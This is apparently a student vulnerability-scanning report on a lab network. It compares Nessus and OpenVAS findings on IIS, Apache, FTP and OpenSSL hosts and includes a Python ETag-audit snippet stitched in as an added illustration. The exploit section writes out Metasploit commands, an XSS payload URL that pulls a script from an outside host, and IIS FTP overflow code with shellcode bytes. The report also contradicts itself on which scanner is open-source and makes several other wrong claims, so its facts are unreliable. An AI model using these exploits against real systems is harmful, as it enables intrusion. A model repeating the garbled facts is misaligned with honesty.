Vulnerability Scanning

Executive Summary

OpenVAS and Nessus are programs used to detect the vulnerabilities of a computer system. A vulnerability is a fault in the system that can be exploited by unauthorized persons to gain access to it. Nessus is open-source software that scans networks, identifies vulnerabilities and scores their severity. OpenVAS, on the other hand, is closed-source software that identifies vulnerabilities in a machine by scanning the running services. This report details the vulnerabilities found in web servers and Windows servers and the exploits associated with those vulnerabilities.

Task Summary

Nmap, a network scanning tool, was used to identify open ports, active hosts and operating systems within the network. The identified hosts were then scanned with OpenVAS and Nessus to identify vulnerabilities. Once the vulnerabilities were identified, further research established the exploits associated with each and the attendant security risk.

Results of the Vulnerability Assessment

Nessus Results

Nmap identified the following machines running web servers: 172.16.11.24/26, 172.16.11.34/26, 172.16.11.43/26 and 172.16.11.9/26. Of these, 172.16.11.43/26 and 172.16.11.34/26 ran a Windows Server operating system, while 172.16.11.11/26 and 172.16.11.24/26 ran Linux. Other servers identified ran Windows Vista, Windows 2000 SP1 and Windows NT, among others. Other services scanned include FTP on 172.16.11.43/26 and SSL/TLS on 172.16.11.24/26.


Web Server Vulnerabilities

The web server vulnerabilities identified by Nessus include Apache Server ETag Header Information Disclosure (on 172.16.11.24/26 and 172.16.11.43/26), Microsoft IIS 6.0 Unsupported Version Detection (172.16.11.34/26), Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow and Microsoft IIS Unicode Remote Command Execution (on server 172.16.11.43/26).

Operating System Vulnerabilities

The most common OS vulnerability identified was an outdated or unsupported OS version. This was common to both Windows and UNIX systems, for example the “Unix OS Unsupported version detected” finding on 172.16.11.24/26.

FTP Server Vulnerability

Nessus identified the “FTP Privileged Port Bounce Scan” vulnerability on 172.16.11.43/26.

OpenVAS Results

Web Server Vulnerability

OpenVAS identified a high-severity “Apache Web Server End of Life Detection (Windows)” vulnerability on 172.16.11.9/26. Microsoft IIS FTP NLST Stack Overflow was identified on 172.16.11.43/26. Additionally, IIS XSS via 404 Error was identified.

Secure Socket Layer (SSL) service vulnerability

OpenVAS identified the SSL/TLS: OpenSSL CCS Man in the Middle Security Bypass vulnerability on 172.16.11.24.

Threats Associated With Vulnerabilities

The Apache Server ETag Header Information Disclosure vulnerability predisposes the system to a security breach because the ETag header reveals the server’s inode numbers. The inode carries information such as file type, permissions, timestamps and file location. Disclosure of this information aids attacks and access to sensitive information (Michael Cross, 2007). An exploit is not necessary for this vulnerability. OpenBSD has released a patch that solves this issue (“core – Apache HTTP Server Version 2.4”, 2019).
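As an added illustration that is not part of the original report, the Python check below parses Apache-style ETag values and flags those in the default inode-size-mtime format that this finding refers to; the HTTP headers in it are a constructed sample, and the FileETag directive mentioned in the comments is Apache's documented configuration setting.

```python
import re

# Apache's default FileETag setting emits "inode-size-mtime" (all hex).
# Setting "FileETag MTime Size" in httpd.conf drops the inode field,
# which is the configuration-level mitigation for this finding.
ETAG_RE = re.compile(r'^(?:W/)?"([0-9a-fA-F]+(?:-[0-9a-fA-F]+){1,2})"$')

def parse_apache_etag(etag):
    """Split an Apache-style ETag into its numeric fields.

    Returns a dict with inode/size/mtime (inode is None when the
    two-field form is used), or None if the value is not Apache-style.
    """
    m = ETAG_RE.match(etag.strip())
    if not m:
        return None
    fields = [int(p, 16) for p in m.group(1).split("-")]
    if len(fields) == 3:
        inode, size, mtime = fields
    else:
        inode = None
        size, mtime = fields
    return {"inode": inode, "size": size, "mtime": mtime}

def etag_leaks_inode(etag):
    """True when the ETag exposes the file's inode number."""
    info = parse_apache_etag(etag)
    return info is not None and info["inode"] is not None

def audit_response_headers(raw_headers):
    """Return (etag, inode) pairs for every inode-revealing ETag header."""
    findings = []
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "etag" and etag_leaks_inode(value):
            findings.append((value.strip(), parse_apache_etag(value)["inode"]))
    return findings

# Constructed sample: one default-format ETag (leaks the inode) and one
# as produced with "FileETag MTime Size" (does not).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Server: Apache/2.2.3
ETag: "2cc6c-4b2-4c5a7bc8ad200"
ETag: "4b2-4c5a7bc8ad200"
Content-Type: text/html"""

if __name__ == "__main__":
    for etag, inode in audit_response_headers(SAMPLE_HEADERS):
        print(f"{etag} reveals inode {inode}")
```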

Microsoft IIS 6.0 Unsupported Version Detection implies that Microsoft Internet Information Services 6.0 is no longer supported, so the vendor will release no new security patches for it. As such, the system is susceptible to current threats.

Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow implies that the IIS web server has malware that may be used remotely by an attacker to execute code on the remote system. An attacker can carry out a buffer overflow attack on the system because of the unchecked buffer in the ISAPI extension. Similarly, Microsoft IIS Unicode Remote Command Execution allows an attacker to execute a program remotely (Microsoft, 2003).

The Unix OS Unsupported version vulnerability detected on 172.16.11.24/26 is due to the OS reaching the end of its lifecycle. As such, the OS no longer receives security updates. Most programs on this system are also outdated. This can be solved by updating to the latest OS version.

FTP Privileged Port Bounce Scan predisposes the system to an FTP bounce attack, in which the FTP server is manipulated into connecting to third-party devices in the network. The other computers in the network are thus susceptible to unsuspected attack.

Microsoft IIS FTP NLST Stack Overflow predisposes the system to various threats depending on the IIS version. In IIS 5.0 it gives attackers remote access to the system. This can be mitigated by limiting write access to authorized management and removing directories that give anonymous users write access.

The IIS XSS via 404 Error vulnerability predisposes the system to a cross-site scripting attack, in which an attacker sends malicious code through a component of a compromised website or application. The client then unknowingly grants permission to the malware, enabling the attacker to obtain higher permissions and access to sensitive information. This can be solved by applying the MS02-18 patch from Microsoft.

The OpenSSL CCS Man in the Middle Security Bypass vulnerability, as the name suggests, predisposes the system to a man-in-the-middle attack. Here, an attacker manipulates the “change cipher spec” messages using a zero-length master key. The end-to-end encryption between client and server is thus breached, for instance through the creation of TLS handshakes/CCS injections.

Exploits for the vulnerabilities

Metasploit can be used to exploit the vulnerabilities above. To begin with, the OpenSSL CCS Man in the Middle Security Bypass exploit can be conducted using the auxiliary/scanner/ssl/openssl_ccs module. The commands used are as follows:

msf > use auxiliary/scanner/ssl/openssl_ccs

msf auxiliary(openssl_ccs) > show actions

…actions…

msf auxiliary(openssl_ccs) > set ACTION <action name>

msf auxiliary(openssl_ccs) > show options

…show and set options…

msf auxiliary(openssl_ccs) > run

(Masashi Kikuchi)

The cross-site scripting attack in IIS XSS via 404 Error can be exploited using the following code: http://<img%09 src=" %09nerror=" document.scripts [0].src %27http%5Cx3a%5Cx2f jscript.dk%5Cx2ftest.js%27; ">script@YOUR.TLD/SomeNonExistantPath. This code loads the URL http://jscript.dk/test, which is sent to the TLD server. The server executes the malicious script when it is loaded (Larholm, 2002).

Microsoft IIS FTPd NLST Stack Overflow can be exploited using the following code:

def exploit
  connect_login
  based = rand_text_alpha_upper(10)
  res = send_cmd(['MKD', based], true)
  print_status(res.strip)
  if (res !~ /directory created/)
    print_error("The root directory of the FTP server is not writeable")
    disconnect
    return
  end
  res = send_cmd(['CWD', based], true)
  print_status(res.strip)
  egg = rand_text_alpha_upper(4)
  hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0"

The Microsoft IIS 5.0 Malformed HTTP Printer Request Header Remote Buffer Overflow vulnerability can be exploited with the following commands:

msf > use exploit/windows/iis/ms01_023_printer

msf exploit(ms01_023_printer) > show targets

…targets…

msf exploit(ms01_023_printer) > set TARGET <target-id>

msf exploit(ms01_023_printer) > show options

…show and set options…

msf exploit(ms01_023_printer) > exploit

(Rapid7)


Nessus versus OpenVAS

While Nessus is closed-source software, OpenVAS is open-source software and thus widely available. Nessus has wide functionality, covering the vulnerability, its exploits and mitigation strategies. OpenVAS reports, on the other hand, are deficient in detail. Nessus can find some weaknesses of the system that OpenVAS fails to detect.

Moreover, for the same parameter, Nessus was found to report more variables than OpenVAS. A limitation common to both is redundant results; that is, the same outcome is presented more than once in the report. Nessus is customizable by end users, for example through the addition of plugins, and can be operated across many platforms, unlike OpenVAS (Lu, 2015).


References

Han, S. W., Kwon, H., Hahn, C., Koo, D., & Hur, J. (2016, July). A survey on MITM and its countermeasures in the TLS handshake protocol. In 2016 Eighth International Conference on Ubiquitous and Future Networks (ICUFN) (pp. 724-729). IEEE.

Lu, L., Han, Z., & Chen, Z. (2015, November). OpenStack Vulnerability Detection and Analysis. In International Conference on Applications and Techniques in Information Security (pp. 245-251). Springer, Berlin, Heidelberg.

Masashi Kikuchi, C. Y. (n.d.). Retrieved February 16, 2019, from https://www.rapid7.com/db/modules/auxiliary/scanner/ssl/openssl_ccs

Michael Cross, S. P. (2007). Web Application Vulnerabilities: Detect, Exploit, Prevent. Burlington: Syngress Publishing Inc, Elsevier Inc.

Microsoft. (2003, June 23). Retrieved February 16, 2019, from docs.microsoft.com: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-023

Rapid7. (n.d.). Retrieved February 16, 2019, from Vulnerability and Exploit Database: https://www.rapid7.com/db/modules/exploit/windows/iis/ms01_023_printer
